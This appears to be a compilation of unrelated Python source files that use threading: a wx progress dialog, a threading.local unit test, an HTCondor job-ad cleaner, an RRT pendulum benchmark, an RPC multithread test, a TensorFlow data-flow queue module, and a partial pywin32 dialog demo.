class ProgressGUI(Progress):
def __init__(self,title,*args,**kwargs):
super(ProgressGUI,self).__init__(*args,**kwargs)
self.title = title
self.dialog = None
self.lock = threading.Lock()
def init(self,message):
if wx.GetApp() is None:
self.app = wx.App( False )
if self.dialog:
return
args = (self.title,message+" "*(60-len(message)), 1001)
t = threading.Thread(target=self.start, args=args)
t.start()
while True:
self.lock.acquire()
if self.dialog:
self.lock.release()
break
self.lock.release()
time.sleep(1)
def start(self,*args):
self.lock.acquire()
self.dialog = wx.ProgressDialog(style=0,*args)
self.lock.release()
def initprogressbar(self, message):
self.init(message)
self.updateprogressbar(0)
# self.dialog.Update(0,message)
def initbar(self, message):
self.init(message)
self.updatebar()
# self.dialog.Update(0,message)
def updateprogressbar(self,value):
self.dialog.Update(value)
def updatebar(self):
self.dialog.Pulse()
|
test_threading_local.py
|
import sys
import unittest
from doctest import DocTestSuite
from test import support
from test.support import threading_helper
import weakref
# import gc
# Modules under test
import _thread
import threading
import _threading_local
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class BaseLocalTest:
@unittest.skip("TODO: RUSTPYTHON, flaky test")
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = self._local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
# gc.collect()
self.assertEqual(len(weaklist), n)
# XXX _threading_local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n))
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
# gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))
def test_derived(self):
# Issue 3088: if there is a threads switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(self._local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
with threading_helper.start_threads(threading.Thread(target=f, args=(i,))
for i in range(10)):
pass
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(self._local):
pass
locals = None
passed = False
e1 = threading.Event()
e2 = threading.Event()
def f():
nonlocal passed
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
# gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed)
# TODO: RUSTPYTHON, __new__ vs __init__ cooperation
@unittest.expectedFailure
def test_arguments(self):
# Issue 1522237
class MyLocal(self._local):
def __init__(self, *args, **kwargs):
pass
MyLocal(a=1)
MyLocal(1)
self.assertRaises(TypeError, self._local, a=1)
self.assertRaises(TypeError, self._local, 1)
def _test_one_class(self, c):
self._failed = "No error message set or cleared."
obj = c()
e1 = threading.Event()
e2 = threading.Event()
def f1():
obj.x = 'foo'
obj.y = 'bar'
del obj.y
e1.set()
e2.wait()
def f2():
try:
foo = obj.x
except AttributeError:
# This is expected -- we haven't set obj.x in this thread yet!
self._failed = "" # passed
else:
self._failed = ('Incorrectly got value %r from class %r\n' %
(foo, c))
sys.stderr.write(self._failed)
t1 = threading.Thread(target=f1)
t1.start()
e1.wait()
t2 = threading.Thread(target=f2)
t2.start()
t2.join()
# The test is done; just let t1 know it can exit, and wait for it.
e2.set()
t1.join()
self.assertFalse(self._failed, self._failed)
def test_threading_local(self):
self._test_one_class(self._local)
def test_threading_local_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_one_class(LocalSubclass)
def _test_dict_attribute(self, cls):
obj = cls()
obj.x = 5
self.assertEqual(obj.__dict__, {'x': 5})
with self.assertRaises(AttributeError):
obj.__dict__ = {}
with self.assertRaises(AttributeError):
del obj.__dict__
def test_dict_attribute(self):
self._test_dict_attribute(self._local)
def test_dict_attribute_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_dict_attribute(LocalSubclass)
# TODO: RUSTPYTHON, cycle detection/collection
@unittest.expectedFailure
def test_cycle_collection(self):
class X:
pass
x = X()
x.local = self._local()
x.local.x = x
wr = weakref.ref(x)
del x
# gc.collect()
self.assertIsNone(wr())
class ThreadLocalTest(unittest.TestCase, BaseLocalTest):
_local = _thread._local
class PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):
_local = _threading_local.local
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadLocalTest))
# suite.addTest(unittest.makeSuite(PyThreadingLocalTest))
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _thread._local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
support.run_unittest(suite)
if __name__ == '__main__':
test_main()
|
cscleaner.py
|
from multiprocessing import Process
import time
import htcondor
import json
import logging
import config
import socket
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
def cleanUp():
while(True):
# Setup condor classes and database connctions
condor_s = htcondor.Schedd()
condor_c = htcondor.Collector()
Base = automap_base()
local_hostname = socket.gethostname()
engine = create_engine("mysql://" + config.db_user + ":" + config.db_password + "@" + config.db_host + ":" + str(config.db_port) + "/" + config.db_name)
Base.prepare(engine, reflect=True)
session = Session(engine)
#setup database objects
Job = Base.classes.condor_jobs
archJob = Base.classes.archived_condor_jobs
Resource = Base.classes.condor_resources
archResource = Base.classes.archived_condor_resources
#Part 1 Clean up job ads
condor_job_list = condor_s.query()
# this query asks for only jobs that contain the local hostname as part of their JobID
db_job_list = session.query(Job).filter(Job.GlobalJobId.like("%" + local_hostname+ "%"))
#loop through the condor data and make a list of GlobalJobId
#then loop through db list checking if they are in the aforementioned list
condor_name_list = []
for ad in condor_job_list:
ad_dict = dict(ad)
condor_name_list.append(ad_dict['GlobalJobId'])
for job in db_job_list:
if job.GlobalJobId not in condor_name_list:
#job is missing from condor, clean it up
logging.info("Found Job missing from condor: %s, cleaning up." % job.GlobalJobId)
job_dict = job.__dict__
logging.info(job_dict)
session.delete(job)
job_dict.pop('_sa_instance_state', None) # metadata not relevent to the job ad, must trim to init with kwargs
new_arch_job = archJob(**job_dict)
session.merge(new_arch_job)
#Part 2 Clean up machine/resource ads
condor_machine_list = condor_c.query()
#this quert asks for only resources containing the local hostname
db_machine_list = session.query(Resource).filter(Resource.Name.like("%" + local_hostname+ "%"))
condor_name_list = []
for ad in condor_machine_list:
ad_dict = dict(ad)
condor_name_list.append(ad_dict['Name'])
for machine in db_machine_list:
if machine.Name not in condor_name_list:
#machine is missing from condor, clean it up
logging.info("Found machine missing from condor: %s, cleaning up." % machine.Name)
machine_dict = machine.__dict__
logging.info(machine_dict)
session.delete(machine)
del machine_dict['_sa_instance_state']
new_arch_machine = archResource(**machine_dict)
session.merge(new_arch_machine)
session.commit()
time.sleep(120) #sleep 2 mins, should probably add this as a config option
if __name__ == '__main__':
logging.basicConfig(filename=config.cleaner_log_file,level=logging.DEBUG)
processes = []
p_cleanup = Process(target=cleanUp)
processes.append(p_cleanup)
# Wait for keyboard input to exit
try:
for process in processes:
process.start()
while(True):
for process in processes:
if not process.is_alive():
logging.error("%s process died!" % process.name)
logging.error("Restarting %s process...")
process.start()
time.sleep(1)
time.sleep(10)
except (SystemExit, KeyboardInterrupt):
logging.error("Caught KeyboardInterrupt, shutting down threads and exiting...")
for process in processes:
try:
process.join()
except:
logging.error("failed to join process %s" % process.name)
|
torquelim-11-07.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Stephane Caron <stephane.caron@normalesup.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Run a benchmark for the inverted pendulum with torque limits (11, 7) Nm.
Planners:
- VIP-RRT
- 1NN-RRT
- 10NN-RRT
- 100NN-RRT
"""
import datetime
import numpy
import os
import pickle
import sys
sys.path.append('.')
sys.path.append('..')
from multiprocessing import Process
from rrtcmp import TestBed
from rrtcmp import TorqueSampleState
from rrtcmp import RRT, VIP_RRT
class Benchmark(object):
pass
benchmark = Benchmark()
benchmark.tunings = {
'sims_per_case': 1, # Number of runs
'random_seed': 42, # seed for random number generation
# Precision
'spatial_prec': 1e-2, # [m]
'time_prec': 1e-2, # [s] smallest integration timestep
# Extension parameters
'max_iter': 6000, # max num. of extensions
'max_simu_duration': 1e4, # max duration for each run in seconds
'modulo': 5, # steer to goal every $modulo extensions
'rrt_neigh_size': 40, # num. of neighbors
'nb_traj_samples': 20, # num. of traj. tested / neighbor / extension
'max_traj_duration': 1.0, # max traj duration for each trajectory
# Pendulum characteristics
'torque_limits': [11., 7.], # [N.m]
'Vmax': 50, # [rad/s^2]
# RRT-specific
'try_exact_steering': False, # use LinAcc steering to goal at every step?
}
benchmark.sims_per_case_max = 40
benchmark.max_iter_max = 10000
benchmark.cases = [
{'run_vip': False}, # defaults # (40 neighbor + VIP) x 40 sims
{'rrt_neigh_size': 1, 'sims_per_case': 20},
{'rrt_neigh_size': 1, 'sims_per_case': 20, 'start_index': 20},
{'rrt_neigh_size': 10, 'sims_per_case': 20},
{'rrt_neigh_size': 10, 'sims_per_case': 20, 'start_index': 20},
{'rrt_neigh_size': 100, 'sims_per_case': 20},
{'rrt_neigh_size': 100, 'sims_per_case': 20, 'start_index': 20},
]
benchmark.trace_dir = './traces/%s' % str(datetime.datetime.today())
sims_per_case_max = benchmark.sims_per_case_max
max_iter_max = benchmark.max_iter_max
Vmax, nb_dof = benchmark.tunings['Vmax'], 2 # the pendulum has two DOFs
X1 = numpy.random.random((sims_per_case_max, max_iter_max, nb_dof))
X2 = numpy.random.random((sims_per_case_max, max_iter_max, nb_dof))
benchmark.rand_poses = numpy.pi * (2. * X1 - 1.)
benchmark.rand_velocities = Vmax * (2. * X2 - 1.)
def run_and_log(benchmark, case_params):
dump_file = '%s/dump-%d.pkl' % (benchmark.trace_dir, os.getpid())
StatePlannerList = [(TorqueSampleState, RRT)]
if 'run_vip' in case_params.keys() and case_params['run_vip']:
StatePlannerList.append((TorqueSampleState, VIP_RRT))
test = TestBed(dump_file, benchmark.tunings, custom_tunings=case_params,
StatePlannerList=StatePlannerList)
test.run(benchmark.rand_poses, benchmark.rand_velocities)
if __name__ == "__main__":
os.mkdir(benchmark.trace_dir)
for test_case in benchmark.cases:
Process(target=run_and_log, args=(benchmark, test_case)).start()
with open('%s/poses.pkl' % benchmark.trace_dir, 'w') as f:
pickle.dump(benchmark.rand_poses, f)
with open('%s/velocities.pkl' % benchmark.trace_dir, 'w') as f:
pickle.dump(benchmark.rand_velocities, f)
|
test_rpc.py
|
''' Test whether rpc works in a multithreads environemnt '''
from spartan import rpc
from spartan import util
import threading
from multiprocessing.pool import ThreadPool
port = 7278
host = "localhost"
#number of threads we launch to send request on one client
NUM_THREADS = 4
class EchoServer(object):
def __init__(self, server):
self._server = server
self._kernel_threads = ThreadPool(processes=1)
def ping(self, req, handle):
handle.done(req)
def run_kernel(self, req, handle):
#simulate the actual run kernel, reply the response in different thread.
self._kernel_threads.apply_async(self._run_kernel, args=(req, handle))
def _run_kernel(self, req, handle):
handle.done(req)
def shutdown(self, req, handle):
util.log_info("Server shutdown")
handle.done()
threading.Thread(target=self._shutdown).start()
def _shutdown(self):
self._server.shutdown()
client = rpc.connect(host, port)
server = rpc.listen(host, port)
server.register_object(EchoServer(server))
def server_fn():
''' Server thread '''
server.serve()
def client_fn():
''' Client thread '''
for i in range(200):
assert client.ping("spartan").wait() == "spartan"
assert client.run_kernel("kernel").wait() == "kernel"
def test_rpc():
client_threads = [threading.Thread(target=client_fn) for i in range(NUM_THREADS)]
server_thread = threading.Thread(target=server_fn)
#used to shutdown server
client = rpc.connect(host, port)
server_thread.start()
for c in client_threads:
c.start()
for c in client_threads:
c.join()
#shutdown server
client.shutdown()
server_thread.join()
|
data_flow.py
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
import tensorflow.compat.v1 as tf
from . import utils
class DataFlow(object):
""" Data Flow.
Base class for using real time pre-processing and controlling data flow.
Supports pipelining for faster computation.
Arguments:
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
"""
def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
continuous=False, ensure_data_order=False,
dprep_dict=None, daug_dict=None):
self.coord = coord
self.num_threads = num_threads
self.max_queue = max_queue
self.shuffle = shuffle
self.continuous = continuous
if ensure_data_order:
self.num_threads = 1
self.max_queue = 1
self.dprep_dict = dprep_dict
self.daug_dict = daug_dict
self.interrupted = False
class FeedDictFlow(DataFlow):
""" FeedDictFlow.
Generate a stream of batches from a dataset. It uses two queues, one for
generating batch of data ids, and the other one to load data and apply pre
processing. If continuous is `True`, data flow will never ends until `stop`
is invoked, or `coord` interrupt threads.
Arguments:
feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
as keys and data as values).
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
index_array: `list`. An optional list of index to be used instead of
using the whole dataset indexes (Useful for validation split).
"""
def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
max_queue=32, shuffle=False, continuous=False,
ensure_data_order=False, dprep_dict=None, daug_dict=None,
index_array=None):
super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
shuffle, continuous,
ensure_data_order,
dprep_dict,
daug_dict)
self.feed_dict = feed_dict
self.batch_size = batch_size
self.n_samples = len(utils.get_dict_first_element(feed_dict))
# Queue holding batch ids
self.batch_ids_queue = queue.Queue(self.max_queue)
# Queue holding data ready feed dicts
self.feed_dict_queue = queue.Queue(self.max_queue)
# Create samples index array
self.index_array = np.arange(self.n_samples)
if index_array is not None:
self.index_array = index_array
self.n_samples = len(index_array)
# Create batches
self.batches = self.make_batches()
self.reset_batches()
# Data Recording
self.data_status = DataFlowStatus(self.batch_size, self.n_samples)
def next(self, timeout=None):
""" next.
Get the next feed dict.
Returns:
A TensorFlow feed dict, or 'False' if it has no more data.
"""
self.data_status.update()
return self.feed_dict_queue.get(timeout=timeout)
def start(self, reset_status=True):
""" start.
Arguments:
reset_status: `bool`. If True, `DataStatus` will be reset.
Returns:
"""
# Start to process data and fill queues
self.clear_queues()
self.interrupted = False
# Reset Data Status
if reset_status:
self.data_status.reset()
# Only a single thread needed for batches ids
bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
# Multiple threads available for feed batch pre-processing
fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
for i in range(self.num_threads)]
self.threads = bi_threads + fd_threads
for t in self.threads:
t.daemon = True
t.start()
def stop(self):
""" stop.
Stop the queue from creating more feed_dict.
"""
# Send stop signal to processing queue
for i in range(self.num_threads):
self.batch_ids_queue.put(False)
# Launch a Thread to wait for processing scripts to finish
t = threading.Thread(target=self.wait_for_threads)
t.daemon = True
t.start()
def reset(self):
""" reset.
Reset batch index.
"""
self.batch_index = -1
def interrupt(self):
# Send interruption signal to processing queue
self.interrupted = True
self.clear_queues()
def fill_feed_dict_queue(self):
while not self.coord.should_stop() and not self.interrupted:
batch_ids = self.batch_ids_queue.get()
if batch_ids is False:
break
data = self.retrieve_data(batch_ids)
# Apply augmentation according to daug dict
if self.daug_dict:
for k in self.daug_dict:
data[k] = self.daug_dict[k].apply(data[k])
# Apply preprocessing according to dprep dict
if self.dprep_dict:
for k in self.dprep_dict:
data[k] = self.dprep_dict[k].apply(data[k])
#all prepped, put the data into the queue
self.feed_dict_queue.put(data)
def fill_batch_ids_queue(self):
while not self.coord.should_stop() and not self.interrupted:
ids = self.next_batch_ids()
if ids is False:
break
self.batch_ids_queue.put(ids)
def next_batch_ids(self):
self.batch_index += 1
if self.batch_index == len(self.batches):
if not self.continuous:
self.stop()
return False
self.reset_batches()
batch_start, batch_end = self.batches[self.batch_index]
return self.index_array[batch_start:batch_end]
def retrieve_data(self, batch_ids):
feed_batch = {}
for key in self.feed_dict:
feed_batch[key] = \
utils.slice_array(self.feed_dict[key], batch_ids)
return feed_batch
def reset_batches(self):
if self.shuffle:
self.shuffle_samples()
# Generate new batches
self.batches = self.make_batches()
self.batch_index = -1
def make_batches(self):
return utils.make_batches(self.n_samples, self.batch_size)
def shuffle_samples(self):
np.random.shuffle(self.index_array)
def wait_for_threads(self):
# Wait for threads to finish computation (max 120s)
self.coord.join(self.threads)
# Send end signal to indicate no more data in feed queue
self.feed_dict_queue.put(False)
def clear_queues(self):
""" clear_queues.
Clear queues.
"""
while not self.feed_dict_queue.empty():
self.feed_dict_queue.get()
while not self.batch_ids_queue.empty():
self.batch_ids_queue.get()
class TFRecordsFlow(DataFlow):
def __init__(self, coord):
super(TFRecordsFlow, self).__init__(coord)
raise NotImplementedError
class DataFlowStatus(object):
""" Data Flow Status
Simple class for recording how many data have been processed.
"""
def __init__(self, batch_size, n_samples):
self.step = 0
self.epoch = 0
self.current_iter = 0
self.batch_size = batch_size
self.n_samples = n_samples
def update(self):
self.step += 1
self.current_iter = min(self.step * self.batch_size, self.n_samples)
if self.current_iter == self.n_samples:
self.epoch += 1
self.step = 0
def reset(self):
self.step = 0
self.epoch = 0
class ArrayFlow(object):
""" ArrayFlow.
Convert array samples to tensors and store them in a queue.
Arguments:
X: `array`. The features data array.
Y: `array`. The targets data array.
multi_inputs: `bool`. Set to True if X has multiple input sources (i.e.
X is a list of arrays).
batch_size: `int`. The batch size.
shuffle: `bool`. If True, data will be shuffled.
Returns:
The `X` and `Y` data tensors or a list(`X`) and `Y` data tensors if
multi_inputs is True.
"""
def __init__(self, X, Y, multi_inputs=False, batch_size=32, shuffle=True,
capacity=None):
# Handle multiple inputs
if not multi_inputs:
X = [X]
if not capacity:
capacity =batch_size * 8
X = [np.array(x) for x in X]
self.X = X
self.Xlen = len(X[0])
Y = np.array(Y)
self.Y = Y
# Create X placeholders
self.tensorX = [tf.placeholder(
dtype=tf.float32,
shape=[None] + list(utils.get_incoming_shape(x)[1:]))
for x in X]
# Create Y placeholders
self.tensorY = tf.placeholder(
dtype=tf.float32,
shape=[None] + list(utils.get_incoming_shape(Y)[1:]))
# FIFO Queue for feeding data
self.queue = tf.FIFOQueue(
dtypes=[x.dtype for x in self.tensorX] + [self.tensorY.dtype],
capacity=capacity)
self.enqueue_op = self.queue.enqueue(self.tensorX + [self.tensorY])
self.batch_size = batch_size
self.multi_inputs = multi_inputs
self.shuffle = shuffle
def iterate(self, X, Y, batch_size):
while True:
# Shuffle array if specified
if self.shuffle:
idxs = np.arange(0, len(X[0]))
np.random.shuffle(idxs)
X = [x[idxs] for x in X]
Y = Y[idxs]
# Split array by batch
for batch_idx in range(0, self.Xlen, batch_size):
batchX = [x[batch_idx:batch_idx + batch_size] for x in X]
batchY = Y[batch_idx:batch_idx + batch_size]
yield batchX, batchY
def get(self):
# get data from the queue
dequeue = self.queue.dequeue()
if self.multi_inputs:
return dequeue[:-1], dequeue[-1]
else:
return dequeue[0], dequeue[1]
def launch_threads(self, session, num_threads=1):
threads = []
for i in range(num_threads):
t = threading.Thread(target=self.thread_main, args=(session,))
t.daemon = True
t.start()
threads.append(t)
return threads
def thread_main(self, sess):
for dataX, dataY in self.iterate(self.X, self.Y, self.batch_size):
feed_dict = {self.tensorY: dataY}
for i, x in enumerate(self.tensorX):
feed_dict[x] = dataX[i]
sess.run(self.enqueue_op, feed_dict=feed_dict)
def generate_data_tensor(X, Y, batch_size, shuffle=True, num_threads=1,
capacity=None):
#TODO: Add a way with no batch?
#TODO: Set threads to #CPUs fo machine
cr = None
if capacity is None:
capacity = batch_size * num_threads * 4
if isinstance(X, tf.Tensor) and isinstance(Y, tf.Tensor):
# Optional Image and Label Batching
if shuffle:
X, Y = tf.train.shuffle_batch([X, Y], batch_size=batch_size,
min_after_dequeue=batch_size,
capacity=capacity,
num_threads=num_threads)
else:
X, Y = tf.train.batch([X, Y], batch_size=batch_size,
capacity=capacity,
num_threads=num_threads)
# Array Input
elif X is not None and Y is not None:
X_shape = list(np.shape(X))
Y_shape = list(np.shape(Y))
# Create a queue using feed_dicts
cr = ArrayFlow(X, Y, batch_size=batch_size, shuffle=shuffle,
capacity=capacity)
X, Y = cr.get()
# Assign a shape to tensors
X_reshape = [-1] + X_shape[1:] if len(X_shape[1:]) > 0 else [-1, 1]
Y_reshape = [-1] + Y_shape[1:] if len(Y_shape[1:]) > 0 else [-1, 1]
X = tf.reshape(X, X_reshape)
Y = tf.reshape(Y, Y_reshape)
return X, Y, cr
|
win32gui_dialog.py
|
# A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demostrates support for windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommened.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32gui_struct
import win32api
import win32con, winerror
import struct, array
import commctrl
import queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.items():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, str):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error as err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
